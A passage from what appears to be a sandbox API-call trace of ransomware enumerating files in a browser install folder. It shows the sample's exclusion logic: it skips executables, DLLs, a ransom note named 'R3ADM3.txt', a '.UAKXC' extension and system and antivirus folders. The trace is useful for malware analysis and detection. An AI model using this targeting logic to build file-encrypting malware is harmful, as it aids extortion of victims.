lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef68420, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x774f8200, ftLastWriteTime.dwHighDateTime=0x1ced1dd, nFileSizeHigh=0x0, nFileSizeLow=0x279, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="application.ini", cAlternateFileName="APPLIC~1.INI")) returned 1 [0139.719] lstrcmpW (lpString1="application.ini", lpString2=".") returned 1 [0139.719] lstrcmpW (lpString1="application.ini", lpString2="..") returned 1 [0139.719] StrStrIW (lpFirst="application.ini", lpSrch=".UAKXC") returned 0x0 [0139.719] StrStrIW (lpFirst="application.ini", lpSrch=".exe") returned 0x0 [0139.719] StrStrIW (lpFirst="application.ini", lpSrch=".dll") returned 0x0 [0139.719] StrStrIW (lpFirst="application.ini", lpSrch=".lnk") returned 0x0 [0139.719] StrStrIW (lpFirst="application.ini", lpSrch=".sys") returned 0x0 [0139.719] StrStrIW (lpFirst="application.ini", lpSrch=".msi") returned 0x0 [0139.720] StrStrIW (lpFirst="application.ini", lpSrch="R3ADM3.txt") returned 0x0 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee680 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0139.720] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0139.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee680 | out: hHeap=0xea0000) returned 1 [0139.720] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.720] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef68420, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2431fb00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x12670, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="breakpadinjector.dll", cAlternateFileName="BREAKP~1.DLL")) returned 1 [0139.720] lstrcmpW (lpString1="breakpadinjector.dll", lpString2=".") returned 1 [0139.720] lstrcmpW (lpString1="breakpadinjector.dll", lpString2="..") returned 1 [0139.720] StrStrIW (lpFirst="breakpadinjector.dll", lpSrch=".UAKXC") returned 0x0 [0139.721] StrStrIW (lpFirst="breakpadinjector.dll", lpSrch=".exe") returned 0x0 [0139.721] StrStrIW (lpFirst="breakpadinjector.dll", lpSrch=".dll") returned=".dll" [0139.721] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf288100, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf288100, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="browser", cAlternateFileName="")) returned 1 [0139.721] lstrcmpW (lpString1="browser", lpString2=".") returned 1 [0139.721] lstrcmpW (lpString1="browser", lpString2="..") returned 1 [0139.721] StrStrIW (lpFirst="browser", lpSrch="tmp") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="winnt") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="temp") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="thumb") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="$Recycle.Bin") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="System Volume Information") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="Boot") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="Windows") returned 0x0 [0139.721] StrStrIW (lpFirst="browser", lpSrch="Trend Micro") returned 0x0 [0139.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.721] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.721] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecea0 [0139.722] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec288 [0139.722] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.722] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744395e0, ftCreationTime.dwHighDateTime=0x1d5a299, ftLastAccessTime.dwLowDateTime=0xeacea730, ftLastAccessTime.dwHighDateTime=0x1d5a92a, ftLastWriteTime.dwLowDateTime=0xeacea730, ftLastWriteTime.dwHighDateTime=0x1d5a92a, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="coreftp.exe", cAlternateFileName="")) returned 1 [0139.722] lstrcmpW (lpString1="coreftp.exe", lpString2=".") returned 1 [0139.722] lstrcmpW (lpString1="coreftp.exe", lpString2="..") returned 1 [0139.722] StrStrIW (lpFirst="coreftp.exe", lpSrch=".UAKXC") returned 0x0 [0139.722] StrStrIW (lpFirst="coreftp.exe", lpSrch=".exe") returned=".exe" [0139.722] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x24ca9180, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1ca70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="crashreporter.exe", cAlternateFileName="CRASHR~1.EXE")) returned 1 [0139.722] lstrcmpW (lpString1="crashreporter.exe", lpString2=".") returned 1 [0139.722] lstrcmpW (lpString1="crashreporter.exe", lpString2="..") returned 1 [0139.722] StrStrIW (lpFirst="crashreporter.exe", lpSrch=".UAKXC") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.exe", lpSrch=".exe") returned=".exe" [0139.722] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x45382300, ftLastWriteTime.dwHighDateTime=0x1ced1d1, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="crashreporter.ini", cAlternateFileName="CRASHR~1.INI")) returned 1 [0139.722] lstrcmpW (lpString1="crashreporter.ini", lpString2=".") returned 1 [0139.722] lstrcmpW (lpString1="crashreporter.ini", lpString2="..") returned 1 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch=".UAKXC") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch=".exe") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch=".dll") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch=".lnk") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch=".sys") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch=".msi") returned 0x0 [0139.722] StrStrIW (lpFirst="crashreporter.ini", lpSrch="R3ADM3.txt") returned 0x0 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd7f0 [0139.723] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.723] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.723] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecec8 [0139.723] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0139.723] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd900 | out: hHeap=0xea0000) returned 1 [0139.723] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd7f0 | out: hHeap=0xea0000) returned 1 [0139.723] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xfd9a7300, ftLastWriteTime.dwHighDateTime=0x1cafd02, nFileSizeHigh=0x0, nFileSizeLow=0x202368, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D3DCompiler_43.dll", cAlternateFileName="D3DCOM~1.DLL")) returned 1 [0139.723] lstrcmpW (lpString1="D3DCompiler_43.dll", lpString2=".") returned 1 [0139.723] lstrcmpW (lpString1="D3DCompiler_43.dll", lpString2="..") returned 1 [0139.723] StrStrIW (lpFirst="D3DCompiler_43.dll", lpSrch=".UAKXC") returned 0x0 [0139.723] StrStrIW (lpFirst="D3DCompiler_43.dll", lpSrch=".exe") returned 0x0 [0139.723] StrStrIW (lpFirst="D3DCompiler_43.dll", lpSrch=".dll") returned=".dll" [0139.723] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf23be40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf23be40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="defaults", cAlternateFileName="")) returned 1 [0139.723] lstrcmpW (lpString1="defaults", lpString2=".") returned 1 [0139.723] lstrcmpW (lpString1="defaults", lpString2="..") returned 1 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="tmp") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="winnt") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="temp") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="thumb") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="$Recycle.Bin") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="System Volume Information") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="Boot") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="Windows") returned 0x0 [0139.724] StrStrIW (lpFirst="defaults", lpSrch="Trend Micro") returned 0x0 [0139.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecef0 [0139.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecef0 | out: hHeap=0xea0000) returned 1 [0139.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecef0 [0139.724] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec2f0 [0139.724] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.724] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefb46e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x52aed680, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dependentlibs.list", cAlternateFileName="DEPEND~1.LIS")) returned 1 [0139.724] lstrcmpW (lpString1="dependentlibs.list", lpString2=".") returned 1 [0139.725] lstrcmpW (lpString1="dependentlibs.list", lpString2="..") returned 1 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch=".UAKXC") returned 0x0 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch=".exe") returned 0x0 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch=".dll") returned 0x0 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch=".lnk") returned 0x0 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch=".sys") returned 0x0 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch=".msi") returned 0x0 [0139.725] StrStrIW (lpFirst="dependentlibs.list", lpSrch="R3ADM3.txt") returned 0x0 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd7f0 [0139.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0139.725] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda10 [0139.725] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd900 | out: hHeap=0xea0000) returned 1 [0139.726] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd7f0 | out: hHeap=0xea0000) returned 1 [0139.726] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf215ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf215ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0139.726] lstrcmpW (lpString1="dictionaries", lpString2=".") returned 1 [0139.726] lstrcmpW (lpString1="dictionaries", lpString2="..") returned 1 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="tmp") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="winnt") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="temp") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="thumb") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="$Recycle.Bin") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="System Volume Information") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="Boot") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="Windows") returned 0x0 [0139.726] StrStrIW (lpFirst="dictionaries", lpSrch="Trend Micro") returned 0x0 [0139.726] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf40 [0139.726] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.727] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.727] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.727] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.727] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.727] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf40 | out: hHeap=0xea0000) returned 1 [0139.727] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf40 [0139.727] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee680 [0139.727] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.727] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefb46e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefb46e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x25fbbe80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x43470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="firefox.exe", cAlternateFileName="")) returned 1 [0139.727] lstrcmpW (lpString1="firefox.exe", lpString2=".") returned 1 [0139.727] lstrcmpW (lpString1="firefox.exe", lpString2="..") returned 1 [0139.727] StrStrIW (lpFirst="firefox.exe", lpSrch=".UAKXC") returned 0x0 [0139.727] StrStrIW (lpFirst="firefox.exe", lpSrch=".exe") returned=".exe" [0139.727] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad0e37c0, ftCreationTime.dwHighDateTime=0x1d5a5ed, ftLastAccessTime.dwLowDateTime=0xe6d1f850, ftLastAccessTime.dwHighDateTime=0x1d5b355, ftLastWriteTime.dwLowDateTime=0xe6d1f850, ftLastWriteTime.dwHighDateTime=0x1d5b355, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="firewall.exe", cAlternateFileName="")) returned 1 [0139.727] lstrcmpW (lpString1="firewall.exe", lpString2=".") returned 1 [0139.727] lstrcmpW (lpString1="firewall.exe", lpString2="..") returned 1 [0139.728] StrStrIW (lpFirst="firewall.exe", lpSrch=".UAKXC") returned 0x0 [0139.728] StrStrIW (lpFirst="firewall.exe", lpSrch=".exe") returned=".exe" [0139.728] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefda840, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefda840, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x26945500, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x383, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="freebl3.chk", cAlternateFileName="")) returned 1 [0139.728] lstrcmpW (lpString1="freebl3.chk", lpString2=".") returned 1 [0139.728] lstrcmpW (lpString1="freebl3.chk", lpString2="..") returned 1 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch=".UAKXC") returned 0x0 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch=".exe") returned 0x0 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch=".dll") returned 0x0 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch=".lnk") returned 0x0 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch=".sys") returned 0x0 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch=".msi") returned 0x0 [0139.728] StrStrIW (lpFirst="freebl3.chk", lpSrch="R3ADM3.txt") returned 0x0 [0139.728] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf68 [0139.728] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.728] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.728] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.728] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf68 | out: hHeap=0xea0000) returned 1 [0139.729] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.729] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf68 [0139.729] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee860 [0139.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.729] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefda840, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefda840, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x26945500, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x49c70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="freebl3.dll", cAlternateFileName="")) returned 1 [0139.729] lstrcmpW (lpString1="freebl3.dll", lpString2=".") returned 1 [0139.729] lstrcmpW (lpString1="freebl3.dll", lpString2="..") returned 1 [0139.729] StrStrIW (lpFirst="freebl3.dll", lpSrch=".UAKXC") returned 0x0 [0139.729] StrStrIW (lpFirst="freebl3.dll", lpSrch=".exe") returned 0x0 [0139.729] StrStrIW (lpFirst="freebl3.dll", lpSrch=".dll") returned=".dll" [0139.729] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefda840, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaefda840, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2ac07280, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x34ca70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gkmedias.dll", cAlternateFileName="")) returned 1 [0139.729] lstrcmpW (lpString1="gkmedias.dll", lpString2=".") returned 1 [0139.729] lstrcmpW (lpString1="gkmedias.dll", lpString2="..") returned 1 [0139.729] StrStrIW (lpFirst="gkmedias.dll", lpSrch=".UAKXC") returned 0x0 [0139.729] StrStrIW (lpFirst="gkmedias.dll", lpSrch=".exe") returned 0x0 [0139.729] StrStrIW (lpFirst="gkmedias.dll", lpSrch=".dll") returned=".dll" [0139.729] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaeef6000, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb125e740, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x5aea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="install.log", cAlternateFileName="")) returned 1 [0139.729] lstrcmpW (lpString1="install.log", lpString2=".") returned 1 [0139.729] lstrcmpW (lpString1="install.log", lpString2="..") returned 1 [0139.729] StrStrIW (lpFirst="install.log", lpSrch=".UAKXC") returned 0x0 [0139.729] StrStrIW (lpFirst="install.log", lpSrch=".exe") returned 0x0 [0139.729] StrStrIW (lpFirst="install.log", lpSrch=".dll") returned 0x0 [0139.729] StrStrIW (lpFirst="install.log", lpSrch=".lnk") returned 0x0 [0139.729] StrStrIW (lpFirst="install.log", lpSrch=".sys") returned 0x0 [0139.729] StrStrIW (lpFirst="install.log", lpSrch=".msi") returned 0x0 [0139.730] StrStrIW (lpFirst="install.log", lpSrch="R3ADM3.txt") returned 0x0 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf90 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.730] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.730] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.730] 